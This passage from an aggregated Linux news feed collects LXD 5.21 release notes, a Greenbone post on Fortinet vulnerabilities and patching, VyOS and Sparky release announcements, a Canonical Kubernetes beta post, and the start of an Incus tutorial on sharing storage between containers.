<p>To cover a wider variety of use cases, we are continuously evaluating adding new storage options and enhancing existing ones. In this LTS, we added support for object storage as well as support for Dell PowerFlex as another option for remote storage.</p>
<h4 class="wp-block-heading">Object storage on Ceph and local storage pools</h4>
<p>LXD now has support for object storage.</p>
<p>We’ve achieved this by adding a whole new concept of storage buckets along with a dedicated command (lxc storage bucket) and APIs. This allows LXD users to create new storage buckets, assign them a size limit and then manage access keys to that bucket. The bucket has its own URL with an S3 API.</p>
<p>For Ceph, we are using its rados gateway providing the S3 API.</p>
<p>For other storage drivers, we are using<a href="https://min.io/"> MinIO project</a>, which lets us offer an S3 compatible API directly from a local storage driver. Please note that this requires an externally provided MinIO server binary, by setting the minio.path setting.</p>
<p>Documentation:<a href="https://documentation.ubuntu.com/lxd/en/latest/howto/storage_buckets/"> How to manage storage buckets and keys</a> and<a href="https://documentation.ubuntu.com/lxd/en/latest/reference/storage_cephobject/"> Ceph Object storage driver</a></p>
<h4 class="wp-block-heading">Dell PowerFlex</h4>
<p>There are various enablement activities between Dell and Canonical as a part of our ongoing partnership. The latest of them is adding support for LXD to interface directly with its PowerFlex service in order to allow LXD instances to be run on its platform. This offers an alternate remote storage option for enterprise use cases, where currently supported storage drivers may not be preferred.</p>
<p>Due to its design, PowerFlex is another LXD storage driver offering remote storage capabilities similar to the already existing implementation for Ceph RBD. </p>
<p>More information can be found in <a href="https://documentation.ubuntu.com/lxd/en/latest/reference/storage_powerflex/">the documentation</a>.</p>
<h3 class="wp-block-heading">Virtual Machines: Live migration, AMD SEV, non-UEFI support and ISO volumes</h3>
<p>Since introducing support for virtual machines 4 years ago we’ve been adding a variety of features to not only ensure feature parity with system containers but also make sure to cover a wide range of our user’s use cases. Some of the highlights for this LTS are support for live migration, non-UEFI VMs and ISO volumes, as well as enabling AMD SEV.</p>
<h4 class="wp-block-heading">Fast live migration for virtual machines</h4>
<p>This release enables a much-improved VM live migration process, eliminating much of the perceivable downtime. Previously, LXD relied on the stateful stop function, which is the ability to write all the running memory and CPU state to disk, then stop the virtual machine, move it to a new system and start it back up again from where it was using the stored state. The improved functionality, on the other hand, allows the source and target servers to communicate right from the start of the migration. This allows for performing any state transfer in the background directly to the target host while the VM is still running, then transferring any remaining disk changes as well as the memory through multiple iterations of the migration logic and finally cutting over to the target system.</p>
<p>Documentation: <a href="https://documentation.ubuntu.com/lxd/en/latest/howto/move_instances/#live-migration-vms">Live migration for virtual machines</a></p>
<h4 class="wp-block-heading">AMD SEV support for virtual machines</h4>
<p>LXD now supports AMD SEV for memory encryption of virtual machines.</p>
<p>On compatible systems (AMD EPYC with firmware and kernel support enabled), setting security.sev to true will have the VM get its memory encrypted with a per-VM key handled by the firmware.</p>
<p>Systems supporting AMD SEV-ES can then turn on security.sev.policy.es to also have the CPU state encrypted for extra security.</p>
<p>Lastly, LXD also supports feeding custom session keys. Combined with LXD’s existing vTPM support, this feature can be used to ensure that the firmware is set up with those user provided keys and that the host operator doesn’t have any ability to tamper with the VM.</p>
<p>Documentation:<a href="https://documentation.ubuntu.com/lxd/en/latest/reference/instance_options/#security-policies"> Instance security options</a></p>
<h4 class="wp-block-heading">Non-UEFI support in LXD VMs (CSM)</h4>
<p>LXD virtual machines have been designed to use a very modern machine definition from the start. This means LXD VMs offer a QEMU Q35 machine type combined with a UEFI firmware (EDK2) and even Secure Boot enabled by default.</p>
<p>While this works great for modern operating systems, it can be a problem when migrating existing physical or virtual machines into LXD as those machines may be using a legacy firmware (BIOS) and not be bootable under UEFI.</p>
<p>This can now be addressed by setting security.csm to true combined with disabling UEFI Secure Boot by setting security.secureboot to false. This switches QEMU to boot via Seabios directly rather than through EDK2.</p>
<p>Documentation:<a href="https://documentation.ubuntu.com/lxd/en/latest/api-extensions/#security-csm"> Security CSM</a></p>
<h4 class="wp-block-heading">ISO volumes</h4>
<p>It is now possible to upload ISO image files as custom storage volumes. These can then be attached to a virtual machine as a bootable CD disk allowing simplified installation of custom operating systems from a “library” of custom ISO volumes.</p>
<p>Documentation:<a href="https://documentation.ubuntu.com/lxd/en/latest/howto/instances_create/#launch-a-vm-that-boots-from-an-iso"> Launch a VM that boots from an ISO</a></p>
<h3 class="wp-block-heading">Instance placement scriptlet</h3>
<p>The instance placement scriptlet feature was added to enable a better alternative to LXD’s default instance placement algorithms. Instead of the default behavior of placing a new instance on whichever cluster member was hosting the fewest instances, this new feature allows users to make a more deliberate choice. Now, users can provide a Starlark scriptlet that decides which cluster member to deploy the new instance on based on information about the new requested instance as well as a list of candidate cluster members. Importantly, while scriptlets are able to access certain information about the instance and the cluster, they cannot access any local data, hit the network or even perform complex time-consuming actions.</p>
<p>Documentation:<a href="https://documentation.ubuntu.com/lxd/en/latest/explanation/clustering/#instance-placement-scriptlet"> Instance placement scriptlet</a></p>
<h3 class="wp-block-heading">Cluster auto-healing</h3>
<p>A commonly requested feature by those using LXD with Ceph and OVN, it’s now possible to have LXD automatically recover from a cluster member failure by effectively evacuating all instances to other systems.</p>
<p>This can only work with Ceph backed instances which don’t rely on any server-specific device or configuration.</p>
<p>This is controlled by a new cluster.healing_threshold which defines a number of seconds after which a cluster member is considered to be offline and its instances relocated.</p>
<p>Documentation:<a href="https://documentation.ubuntu.com/lxd/en/latest/howto/cluster_manage/#automatic-evacuation"> Automatic cluster evacuation</a></p>
<h3 class="wp-block-heading">Shiftfs support has been removed</h3>
<p>Following the removal of shiftfs from the Ubuntu kernel (from Mantic onwards) LXD has now also dropped support for shiftfs. The preferred way for container filesystems to have their UID/GID mappings dynamically shifted is with idmapped mounts. In recent kernels this is now supported for ZFS and Cephfs filesystem (in addition to the long standing support for ext4, xfs and btrfs filesystem).</p>
<p>The features outlined above are only the major highlights of this release. You can read the detailed announcement with a complete changelog on our <a href="https://discourse.ubuntu.com/t/lxd-5-21-0-lts-has-been-released/42476">discourse</a>. </p>
<p><em>To get started with LXD, follow the</em><a href="https://documentation.ubuntu.com/lxd/en/latest/tutorial/first_steps/"><em> get started guide</em></a><em>.</em></p>
<p><em>Learn more about LXD on the </em><a href="https://canonical.com/lxd"><em>LXD webpage</em></a><em>.</em></p>Ubuntu developershttp://planet.ubuntu.com/Chinese hackers and Fortinet vulnerabilities: Warnings from US governmenthttps://www.greenbone.net/?p=402972024-03-15T06:57:17+00:00<p>For several years in a row, the Californian manufacturer Fortinet has been in the public focus due to serious security problems. Known for its secure firewall, VPN and intrusion detection devices, the cyber security expert was again forced to announce several highly critical security vulnerabilities in February 2024.</p>
<p>Staying informed and applying patches promptly is what companies need to proactively protect themselves against such attacks. Products such as Greenbone’s Enterprise Appliances play a central role in this and are meant to help admins. All the vulnerabilities mentioned in this blog post are covered by tests from the Greenbone Enterprise Feed: active procedures check whether the exploit is possible, and versioning tests will deliver results about the success of patch management.</p>
<p><img alt="" class="alignnone size-full wp-image-40371" height="450" src="https://www.greenbone.net/wp-content/uploads/tracking-news-fortinet.jpg" width="1050" /></p>
<p><strong>87,000 passwords: Fortinet wins “Vulnerability of the Year 2022”</strong></p>
<p>In 2019, <a class="wpel-icon-right" href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379" rel="noopener external noreferrer" target="_blank">CVE-2018-13379<span class="wpel-icon wpel-image wpel-icon-19"></span></a> (CVSS 9.8) allowed over 87,000 passwords for the Fortinet VPN to be read from the devices. In the following years, this vulnerability was exploited so successfully that in 2022 it was awarded the dubious title of “<a class="wpel-icon-right" href="https://thehackernews.com/2023/08/major-cybersecurity-agencies.html" rel="noopener external noreferrer" target="_blank">most exploited vulnerability of 2022<span class="wpel-icon wpel-image wpel-icon-19"></span></a>“. The US authorities reacted and urged all of their clients to be more aware of the problem: Both U.S. Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA) and the Federal Bureau of Investigation (FBI) warned about the fact that many customers did not <a class="wpel-icon-right" href="https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities" rel="noopener external noreferrer" target="_blank">apply patches promptly<span class="wpel-icon wpel-image wpel-icon-19"></span></a>. Again, lack of foresight turned out to be one of the main reasons. Patching, so the agencies, would have prevented many of successful attacks.</p>
<p><strong>2023: Unwanted guests in critical networks</strong></p>
<p>What makes it worse, is the fact that Fortinet devices are mostly being used in security-critical areas. Unpatched and equipped with serious vulnerabilities, such devices have become the focus of attackers in recent years, especially by state actors. In 2023, for example, Chinese hacker groups successfully infiltrated <a class="wpel-icon-right" href="https://www.reuters.com/technology/cybersecurity/china-cyber-spies-hacked-computers-dutch-defence-ministry-report-2024-02-06/" rel="noopener external noreferrer" target="_blank">Dutch military networks<span class="wpel-icon wpel-image wpel-icon-19"></span></a> via a vulnerability in the FortiOS SSL VPN from December 2022 that actually had already been patched for a while <a class="wpel-icon-right" href="https://thehackernews.com/2022/12/fortinet-warns-of-active-exploitation.html" rel="noopener external noreferrer" target="_blank">(CVE-2022-42475<span class="wpel-icon wpel-image wpel-icon-19"></span></a>, CVSS 9.3).</p>
<p>Even though the network was only used for research and development according to the Military Intelligence and Security Service <a class="wpel-icon-right" href="https://www.defensie.nl/onderwerpen/militaire-inlichtingen-en-veiligheid/nieuws/2024/02/06/mivd-onthult-werkwijze-chinese-spionage-in-nederland" rel="noopener external noreferrer" target="_blank">(MIVD<span class="wpel-icon wpel-image wpel-icon-19"></span></a>), the attacks published at the beginning of February made it clear how easy it is for attackers to penetrate even highly protected networks. Even worse so, the corresponding backdoor “Coathanger” allows attackers to gain permanent access to devices once they have been hacked, all thanks to the vulnerability 2022-42475, which allows the execution of arbitrary code.</p>
<p><strong>February 2024: Warnings of further vulnerabilities, maximum severity</strong></p>
<p>Unfortunately, the story does not end here: Fortinet also had to admit another serious vulnerability, beginning of February 2024: <a class="wpel-icon-right" href="https://nvd.nist.gov/vuln/detail/CVE-2024-21762" rel="noopener external noreferrer" target="_blank">CVE-2024-21762<span class="wpel-icon wpel-image wpel-icon-19"></span></a> (CVSS score: 9.6) allows unauthorized attackers to execute arbitrary code via specially adapted requests. <a class="wpel-icon-right" href="https://fortiguard.fortinet.com/psirt/FG-IR-24-015" rel="noopener external noreferrer" target="_blank">A long list of versions<span class="wpel-icon wpel-image wpel-icon-19"></span></a> of the Fortinet operating system FortiOS and FortiProxy are affected. The manufacturer advises upgrading or deactivating the SSL VPN and warns of both the severity of the vulnerability and the fact that it is already being massively exploited by attackers.</p>
<p>Fortinet seemed to have some organizational issues, too. Just as bad as the above sounded <a class="wpel-icon-right" href="https://nvd.nist.gov/vuln/detail/CVE-2024-23108" rel="noopener external noreferrer" target="_blank">CVE-2024-23108<span class="wpel-icon wpel-image wpel-icon-19"></span></a> and <a class="wpel-icon-right" href="https://nvd.nist.gov/vuln/detail/CVE-2024-23109" rel="noopener external noreferrer" target="_blank">CVE-2024-23109<span class="wpel-icon wpel-image wpel-icon-19"></span></a>, published just a few days later, which also allow unauthenticated attackers to execute arbitrary code. However, these CVEs have to be taken with a grain of salt: The fact that two CVEs from the same manufacturer received a 10.0 on the threat severity scale on the same day is probably unique and raised some experts’ eyebrows. Apart from that, the confusing communication from the vendor was <a class="wpel-icon-right" href="https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-fortisiem-rce-bugs-in-confusing-disclosure/" rel="noopener external noreferrer" target="_blank">not really likely to establish or further trust<span class="wpel-icon wpel-image wpel-icon-19"></span></a>, similarly to the strange story of <a class="wpel-icon-right" href="https://www.bleepingcomputer.com/news/security/no-3-million-electric-toothbrushes-were-not-used-in-a-ddos-attack/" rel="noopener external noreferrer" target="_blank">toothbrush-based attacks told by a Fortinet employee<span class="wpel-icon wpel-image wpel-icon-19"></span></a>, reaching the mass media at the same time.</p>
<p><strong>Fatal combination – vulnerability management can help</strong></p>
<p>As always, Fortinet published patches promptly, but customers also have to install them. Again, the combination of serious security vulnerabilities, lack of awareness and the absence of patches showed its full impact: Only a few days later the US government pushed out another advisory from CISA, NSA and FBI about <a class="wpel-icon-right" href="https://www.reuters.com/technology/what-is-volt-typhoon-alleged-china-backed-hacking-group-2023-05-25/" rel="noopener external noreferrer" target="_blank">Volt Typhoon<span class="wpel-icon wpel-image wpel-icon-19"></span></a>, a Chinese state hacker group. The US government had evidence that these attackers have permanently nested in critical infrastructure of US authorities for many years via such vulnerabilities – the associated risks should not be underestimated, according to the warning.</p>
<p>The security by design required there also includes the constant monitoring of one’s own servers, computers and installations with vulnerability tests such as those of Greenbone Enterprise Appliances. Those who constantly monitor their networks (not just Fortinet devices) with the vulnerability tests of a modern vulnerability scanner can inform their administrators as quickly as possible if known CVEs in an infrastructure are waiting for patches, reducing the attack surface.</p>
<p>
</p><div class="hr av-1ddswlt-93c4782ac74f531d7189d494a9a04737 hr-invisible avia-builder-el-0 el_before_av_buttonrow avia-builder-el-first "><span class="hr-inner "><span class="hr-inner-style"></span></span></div> <div class="avia-buttonrow-wrap av-vqje4x-da998fe7aa00e0104196fad110497ace avia-buttonrow-center avia-builder-el-1 el_after_av_hr avia-builder-el-last ">
<a class="avia-button av-kx79twwb-1c09c8c56c0152ff288ee4a4ef9fd389 avia-icon_select-yes-left-icon avia-size-medium avia-color-theme-color-highlight" href="https://www.greenbone.net/en/contact/"><span class="avia_button_icon avia_button_icon_left "></span><span class="avia_iconbox_title">Contact</span></a>
<a class="avia-button av-kx79z1a6-873a7764d55d4721d4d38570b8d4cadd avia-icon_select-yes-left-icon avia-size-medium avia-color-theme-color-highlight" href="https://www.greenbone.net/en/testnow/"><span class="avia_button_icon avia_button_icon_left "></span><span class="avia_iconbox_title">Free Trial</span></a>
<a class="avia-button av-kx7a0678-58fdc263cf8c00ceb21355ee9025a8e5 avia-icon_select-yes-left-icon avia-size-medium avia-color-theme-color-highlight" href="https://www.greenbone.net/en/product-request/"><span class="avia_button_icon avia_button_icon_left "></span><span class="avia_iconbox_title">Buy Here</span></a>
<a class="avia-button av-kx7a0678-1-1c3b9175ad163e39606cdcd55873351b avia-icon_select-yes-left-icon avia-size-medium" href="https://www.greenbone.net/en/blog/"><span class="avia_button_icon avia_button_icon_left "></span><span class="avia_iconbox_title">Back to Overview</span></a> </div><p></p>Markus Feilnerhttps://www.greenbone.net/en/VyOS 1.4.0-epa2https://blog.vyos.io/vyos-1.4.0-epa2-release2024-03-15T00:36:40+00:00<div class="hs-featured-image-wrapper">
<a class="hs-featured-image-link" href="https://blog.vyos.io/vyos-1.4.0-epa2-release" title=""> <img alt="VyOS 1.4.0-epa2" class="hs-featured-image" src="https://blog.vyos.io/hubfs/VyOS%201.4.0-epa2%20release.png" style="width: auto !important; float: left; margin: 0 15px 15px 0;" /> </a>
</div>
<p>Hello, Community!</p>
<p>VyOS 1.4.0-epa2 <span>image is now available to customers and contributors (and <a href="https://docs.vyos.io/en/sagitta/contributing/build-vyos.html">everyone can build it</a> from the sagitta branch of <a href="https://github.com/vyos/vyos-build/">vyos-build</a>, of course)! If you are new to VyOS, the "EPA" part means "early production access" — the final stage when the release is already used in production by a subset of users and on our proper infrastructure. This is the second release on the path to the final stabilization of the 1.4.0/Sagitta branch. It mainly features bug fixes but contains minor features </span></p>Daniil Baturindaniil@sentrium.ioSparky 7.3https://sparkylinux.org/?p=122922024-03-14T21:17:51+00:00<p>The 3rd update of Sparky 7 – 7.3 is out.</p>
<p>It is a quarterly updated point release of Sparky 7 “Orion Belt” of the stable line. Sparky 7 is based on and fully compatible with Debian 12 “Bookworm”.</p>
<p>Changes:<br />
– all packages updated from Debian and Sparky stable repos as of March 13, 2024<br />
– Linux kernel PC: 6.1.67 LTS (6.8.0, 6.6.21-LTS & 5.15.151-LTS in sparky repos)<br />
– Linux kernel ARM: 6.6.20 LTS<br />
– LibreOffice 7.4.7<br />
– KDE Plasma 5.27.5<br />
– LXQt 1.2.0<br />
– MATE 1.26<br />
– Xfce 4.18<br />
– Openbox 3.6.1<br />
– Firefox 115.8.0esr (123.0.1-sparky in sparky repos)<br />
– Thunderbird 115.8.0<br />
– VLC 3.0.20<br />
– Exaile 4.1.3<br />
– added new application (amd64 only): <a href="https://sparkylinux.org/noi-imaginer/">Noi</a> – a chatboot GUI application with support for ChatGPT, Claude, Bard, Poe, Perplexity, Copilot, HuggingChat, Pi, Coze and YOU. </p>
<p>Sparky 7.3 “Orion Belt” is available in the following versions:<br />
– amd64 BIOS/UEFI+Secure Boot: Xfce, LXQt, MATE, KDE Plasma, MinimalGUI (Openbox) & MinimalCLI (text mode)<br />
– i686 non-pae BIOS/UEFI (Legacy): MinimalGUI (Openbox) & MinimalCLI (text mode)<br />
– ARMHF & ARM64 Openbox & CLI</p>
<p>Make sure that the ‘os-prober’ will be not executed to detect other bootable partitions as default, but Sparky provides a GRUB option to detect other OSes anyway.<br />
But, a next updating of GRUB packages override the option.<br />
To fix that manually, add the line:<br />
<code>GRUB_DISABLE_OS_PROBER=false</code><br />
on the end of the file (as root):<br />
<code>/etc/default/grub</code><br />
Then update grub:<br />
<code>sudo update-grub</code></p>
<p>PC live user:password = live:live<br />
ARM user:password = pi:sparky</p>
<p>If you have Sparky 7 installed – simply keep it up to date. No need to reinstall your OS.</p>
<p>New iso images of Sparky 7 “Orion Belt” can be downloaded from the <a href="https://sparkylinux.org/download/stable/">download/stable</a> page</p>
<p>Informacja o wydaniu w języku polskim: <a href="https://linuxiarze.pl/sparky-7-3/">https://linuxiarze.pl/sparky-7-3/</a></p>
<div class="simplesocialbuttons simplesocial-flat-button-border simplesocialbuttons_inline simplesocialbuttons-align-left post-12292 post simplesocialbuttons-inline-no-animation">
<button class="simplesocial-fb-share" rel="nofollow" target="_blank"><span class="simplesocialtxt">Facebook </span> </button>
<button class="simplesocial-twt-share" rel="nofollow" target="_blank"><span class="simplesocialtxt">Twitter</span> </button>
<button class="simplesocial-reddit-share" rel="nofollow" target="_blank"><span class="simplesocialtxt">Reddit</span> </button>
<button class="simplesocial-tumblr-share" rel="nofollow" target="_blank"><span class="simplesocialtxt">Tumblr</span> </button>
</div>pavroohttps://sparkylinux.orgUbuntu Blog: How should a great K8s distro feel? Try the new Canonical Kubernetes, now in betahttps://ubuntu.com//blog/try-canonical-kubernetes-beta2024-03-14T13:06:16+00:00<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="627" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1200,h_627/https://ubuntu.com/wp-content/uploads/e0c0/infrastructure-maintenance.png" width="1200" />
</noscript>
</div>
</figure>
<p>Kubernetes revolutionised container orchestration, allowing faster and more reliable application deployment and management. But even though it transformed the world of DevOps, it introduced new challenges around security maintenance, networking and application lifecycle management. </p>
<p>Canonical has a long history of providing production-grade Kubernetes distributions, which gave us great insights into Kubernetes’ challenges and the unique experience of delivering K8s that match the expectations of both developers and operations teams. Unsurprisingly, there is a world of difference between them. Developers need a quick and reproducible way to set up an application environment on their workstations. Operations teams with clusters powering the edge need lightweight high-availability setups with reliable upgrades. Cloud installations need intelligent cluster lifecycle automation to ensure applications can be integrated with each other and the underlying infrastructure.</p>
<p>We provide two distributions, Charmed Kubernetes and MicroK8s, to meet those different expectations. <a href="https://ubuntu.com/kubernetes/charmed-k8s">Charmed Kubernetes</a> wraps upstream K8s with software operators to provide lifecycle management and automation for large and complex environments. It is also the best choice if the Kubernetes cluster has to integrate with custom storage, networking or GPU components. <a href="http://microk8s.io">Microk8s</a> has a thriving community of users; it is a production-grade, ZeroOps solution that powers laptops and edge environments. It is the simplest way to get Kubernetes anywhere and focus on software product development instead of working with infrastructure routines and operations.</p>
<p>After providing Kubernetes distributions for over seven years, we decided to consolidate our experience into a new distribution that combines the best of both worlds: ZeroOps for small clusters and intelligent automation for larger production environments that also want to benefit from the latest community innovations.</p>
<p>Canonical Kubernetes will be our third distribution and an excellent foundation for future MicroK8s and Charmed Kubernetes releases. You can find its beta in our Snap Store under the simple name <a href="https://snapcraft.io/k8s"><em>k8s</em></a>. We based it on the latest upstream Kubernetes 1.30 beta, which officially came out on 12 March. It will be a CNCF conformant distribution with an enhanced security posture and best-in-class open source components for the most demanding user needs: network, DNS, metrics server, local storage, ingress, gateway, and load balancer.</p>
<h2 class="wp-block-heading">ZeroOps with the most essential features built-in</h2>
<p>Canonical Kubernetes is easy to install and easy to maintain. Like MicroK8s, Canonical Kubernetes is installed as a snap, giving developers a great installation experience and advanced security features such as automated patch upgrades. Adding new nodes to your cluster comes with minimum hassle. It also provides a quick way to set up high availability.</p>
<p>You need two commands to get a single node cluster, one for installation and another for cluster bootstrap. You can try it out now on your console by installing the <a href="https://snapcraft.io/k8s"><em>k8s</em> snap</a> from the beta channel:</p>
<pre class="wp-block-code"><code><code>sudo snap install k8s --channel=1.30-classic/beta --classic
sudo k8s bootstrap</code></code></pre>
<p>If you look at the status of your cluster just after bootstrap – with the help of the <em>k8s status</em> command – you might immediately spot that the <em>network</em>, <em>dns</em>, and <em>metrics-server</em> are already running. In addition to those three, Canonical Kubernetes also provides <em>local-storage</em>, <em>ingress</em>, <em>gateway</em>, and <em>load-balancer,</em> which you can easily enable. Under the hood, these are powered by Cilium, CoreDNS, OpenEBS, and Metrics Server. We bundle these as built-in features to ensure tight integration and a seamless experience. We want to emphasise standard Kubernetes APIs and abstractions to minimise disruption during upgrades while enabling the platform to evolve.</p>
<p>All our built-in features come with default configurations that make sense for the most popular use cases, but you can easily change them to suit your needs.</p>
<h2 class="wp-block-heading">Same Kubernetes for developer workstations, edge, cloud and data centres</h2>
<p>Typical application development flows start with the developer workstation and go through CI/CD pipelines to end up in the production environment. These software delivery stages, spanning various environments, should be closely aligned to enhance developer experience and avoid infrastructure configuration surprises as your software progresses through the pipeline. When done right, you can deploy applications faster. You also get better security assurance as everyone can use the same K8s binary offered by the same vendor across the entire infrastructure software stack.</p>
<p>When you scale up from the workstation to a production environment, you will inevitably be exposed to a different class of problems inherent to large-scale infrastructure. For instance, managing and upgrading cluster nodes becomes complicated and time-consuming as the number of nodes and applications grows. To provide the smooth automation administrators need, we offer Kubernetes lifecycle management through <a href="https://charmhub.io/k8s">Juju</a>, Canonical’s open source orchestration engine for software operators. </p>
<p>If you have Juju installed on your machine already, a Canonical Kubernetes cluster is only a single command away:</p>
<pre class="wp-block-code"><code>juju deploy k8s --channel edge</code></pre>
<p>By letting <a href="https://charmhub.io/k8s">Juju Charm</a> automate your lifecycle management, you can benefit from its rich integration ecosystem, including the Canonical Observability Stack.</p>
<h2 class="wp-block-heading">Enhanced security posture</h2>
<p>Security is critical to any Kubernetes cluster, and we have addressed it from the beginning. Canonical Kubernetes 1.30 installs as a snap with a classic confinement level, enabling automatic patch upgrades to protect your infrastructure against known vulnerabilities. Canonical Kubernetes will be shipped as a strict snap in the future, which means it will run in complete isolation with minimal access to the underlying system’s resources. Additionally, Canonical Kubernetes will comply with security standards like FIPS, CIS and DISA-STIG.</p>
<p>Critical functionalities we have built into Canonical Kubernetes, such as <em>networking</em> or <em>dns</em>, are shipped as secure container images maintained by our team. Those images are built with Ubuntu as their base OS and benefit from the same security commitments we make on the distribution.</p>
<p>While it is necessary to contain core Kubernetes processes, we must also ensure that the user or operator-provided workloads running on top get a secure, adequately controlled environment. Future versions of Canonical Kubernetes will provide AppArmor profiles for the containers that do not inherit the enhanced features of the underlying container runtime. We will also work on creating an allowlist for kernel modules that can be loaded using the Kubernetes Daemonsets. It will contain a default list of the most popular modules, such as GPU modules needed by AI workloads. Operators will be able to edit the allowlist to suit their needs.</p>
<h2 class="wp-block-heading">Try out Canonical Kubernetes 1.30 beta</h2>
<p>We would love for you to try all the latest features in upstream Kubernetes through our beta. Get started by visiting <a href="http://documentation.ubuntu.com/canonical-kubernetes">http://documentation.ubuntu.com/canonical-kubernetes</a></p>
<p>Besides getting a taste of the features I outlined above, you’ll be able to try <a href="https://github.com/orgs/kubernetes/projects/175/views/1?filterQuery=status%3A%22Tracked+for+Code+Freeze%22&sortedBy%5Bdirection%5D=desc&sortedBy%5BcolumnId%5D=71335256">exciting changes</a> that will soon be included in the upcoming upstream GA release on 17 April 2024. Among others, <em>CEL for admission controls</em> will become stable, and the <em>drop-in directory for Kubelet configuration files</em> will go to the beta stage. Additionally, <em>Contextual logging</em> and <em>CRDValidationRatcheting</em> will graduate to beta and be enabled by default. There are also new metrics, such as <em>image_pull_duration_seconds,</em> which can tell you how much time the node spent waiting for the image.</p>
<p>We want Canonical Kubernetes to be a great K8s for everyone, from developers to large-scale cluster administrators.</p>
<p>Try it out and let us know what you think. We would love your feedback! You can find contact information on <a href="https://documentation.ubuntu.com/canonical-kubernetes/latest/reference/community">our community page</a>.</p>
<p>We’ll also be available at <a href="https://ubuntu.com/blog/meet-canonical-at-kubecon-eu">KubeCon in Paris, at booth E25</a> – if you are there, come and say hi.</p>
<p></p>Ubuntu developershttp://planet.ubuntu.com/Simos Xenitellis: How to manage the files of several Incus containers from a separate Incus containerhttps://blog.simos.info/?p=465302024-03-14T11:31:58+00:00<p><a href="https://linuxcontainers.org/incus/">Incus</a> is a manager for virtual machines and system containers. </p>
<p>A <strong>system container</strong> is an instance of an operating system that also runs on a computer, along with the main operating system. A system container uses, instead, security primitives of the Linux kernel for the separation from the main operating system. You can think of system containers as <em>software virtual machines</em>.</p>
<p>In this post we are going to see <strong><em>how to conveniently manage the files of several Incus containers from a separate Incus container</em></strong>. The common use-case is that you have several Incus containers that each one of them is a Website and you want your Web developer to have access to the files from a central location with either FTP or SFTP. Ideally, that central location should be an Incus container as well.</p>
<p>Therefore, we are looking on <strong><em>how to share storage between containers</em></strong>. The other case that we are not looking here, is how to share storage between the host and the containers. </p>
<h2 class="wp-block-heading" id="the-setup">The setup</h2>
<p>We are creating several Incus containers and each one of them is a separate web server. Each web server expects to find the Web content files in the <code>/var/www/</code> directory. Then, we want to create a separate container for the Web developer in order to give access to those <code>/var/www/</code> directories from some central location. The Web developer will get access to that specific container and only that container. As Incus admins we are supposed to provide access to the Web developer to that specific container through SSH or FTP. </p>
<p>In this setup, the Incus container for the web server is <code>webserver1</code> and the Web developer’s container is called <code>webdev</code>.</p>
<p>We will be creating <em><strong>storage volumes</strong></em> for each web server from the Incus storage pool, then <code>incus attach</code> those volumes to both the corresponding web server container and the Web developer’s container. </p>
<h2 class="wp-block-heading" id="setting-up-the-incus-container-for-webserver1">Setting up the Incus container for <code>webserver1</code></h2>
<p>First we create the web server container, <code>webcontainer1</code>, and install the web server package. By default, the <em>nginx</em> web server creates a directory <code>html</code> into <code>/var/www/</code> for our default Web server. In there we will be attaching in the <em>next+3</em> step the storage volume to store the files for this web server .</p>
<pre class="wp-block-code"><code>$ <kbd>incus launch images:debian/12/cloud webserver1</kbd>
Launching webserver1
$ <kbd>incus exec webserver1 -- su --login debian</kbd>
debian@webserver1:~$ <kbd>sudo apt update</kbd>
...
debian@webserver1:~$ <kbd>sudo apt install -y nginx</kbd>
...
debian@webserver1:~$ <kbd>cd /var/www/</kbd>
debian@webserver1:/var/www$ <kbd>ls -l</kbd>
total 1
drwxr-xr-x 2 root root 3 Mar 14 08:34 html
debian@webserver1:/var/www$ <kbd>ls -l html/</kbd>
total 1
-rw-r--r-- 1 root root 615 Mar 14 08:34 index.nginx-debian.html
debian@webserver1:/var/www$ </code></pre>
<h2 class="wp-block-heading" id="setting-up-the-incus-container-for-webdev">Setting up the Incus container for <code>webdev</code></h2>
<p>Then, we create the Incus container for the Web developer. Ideally, you should provide access to this container to your Web developer through SSH/SFTP. Use <code>incus config device add</code> to create a <em>proxy device</em> in order to give access to your Web developer. Here, we create a <code>WEBDEV</code> directory in the home directory of the default <code>debian</code> user account of this container. In there, in the next step, we will be attaching the separate storage volumes of each web server. </p>
<pre class="wp-block-code"><code>$ <kbd>incus launch images:debian/12/cloud webdev</kbd>
Launching webdev
$ <kbd>incus exec webdev -- su --login debian</kbd>
debian@webdev:~$ <kbd>pwd</kbd>
/home/debian
debian@webdev:~$ <kbd>mkdir WEBDEV</kbd>
debian@webdev:~$ <kbd>ls -l </kbd>
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:28 WEBDEV
debian@webdev:~$ </code></pre>
<h2 class="wp-block-heading" id="setting-up-the-storage-volume-for-each-web-server">Setting up the storage volume for each web server</h2>
<p>When you launch an Incus container, you get automatically a single storage volume for the files of that container. We are treating ourselves and we create an extra storage volume for the web data. But let’s learn a bit about storage, storage pools and storage volumes. </p>
<p>We run <code>incus storage list</code> to get a list of storage pools for our installation. In this case, the <strong><em>storage pool</em></strong> is called <code>default</code>(<em>name</em>), we are using ZFS for storage (<em>driver</em>), and the ZFS pool (<em>source</em>) is called <code>default</code> as well. For the last part, you can run <code>zpool list</code> to verify the ZFS pool details. For the <code>USED BY</code>number of 89 in this example, you can verify it from the output of <code>zfs list</code>.</p>
<pre class="wp-block-code"><code>$ <kbd>incus storage list</kbd>
+---------+--------+---------+-------------+---------+---------+
| NAME | DRIVER | SOURCE | DESCRIPTION | USED BY | STATE |
+---------+--------+---------+-------------+---------+---------+
| default | zfs | default | | 89 | CREATED |
+---------+--------+---------+-------------+---------+---------+
$ <kbd>zpool list</kbd>
NAME SIZE ALLOC FREE CKPOINT EXPANDSZ FRAG CAP DEDUP HEALTH ALTROOT
default 512G 136.9G 375.1G - - 8% 18% 1.00x ONLINE -
$ </code></pre>
<p>We run <code>incus storage volume list</code> to get a list of the storage volumes in Incus. I am not show the output here because it’s big. The first column is the <strong><em>type</em></strong> of the storage volume, either</p>
<ol>
<li><code>container</code>, one per system container, </li>
<li><code>image</code>, for each cache image from a remote like <a href="http://images.linuxcontainers.org">images.linuxcontainers.org</a>, </li>
<li><code>virtual-machine</code>, for each virtual machine, or</li>
<li> <code>custom</code>, for those created by ourselves as we are going to do in a moment.</li>
</ol>
